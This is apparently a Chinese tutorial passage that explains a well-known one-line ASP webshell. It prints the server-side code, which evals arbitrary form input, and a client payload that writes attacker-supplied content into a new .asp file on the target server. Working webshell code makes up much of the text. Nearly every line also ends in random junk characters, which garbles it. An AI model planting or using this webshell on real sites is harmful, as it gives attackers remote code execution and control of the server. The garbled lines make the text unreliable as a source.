就拿我们经常使用的冰狐大哥的一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理. Kv'2^B
首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: ab!,)^
<textarea name=# cols="80" rows="10"> 5-M EOy(
set iP=server.createObject("Adodb.Stream") b-8{bP]n
iP.Open _ji"##K
iP.Type=2 n*6Oa/JG7
iP.CharSet="gb2312" cv(9v =](
iP.writetext request("aoyun")
C9[Jr)QX
iP.SaveToFile server.mappath("aoyunwan.asp"),2 hPa:>e
iP.Close ^uIP
set iP=nothing tCAh?nR
response.redirect "aoyunwan.asp" 6eqxwj{S[
</textarea> f"zXiUV
学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了: GsG.9nd
set iP=server.createObject("Adodb.Stream") !rzbm&@
iP.Open 79|=y7i#
iP.Type=2 :c@v_J6C&
iP.CharSet="gb2312" 5F{NPKaQ
iP.writetext request("aoyun") TU4"7]/{M
iP.SaveToFile server.mappath("aoyunwan.asp"),2 QS:dr."k
iP.Close eAh~`
set iP=nothing `LU[+F8<
response.redirect "aoyunwan.asp" Eg&xIyR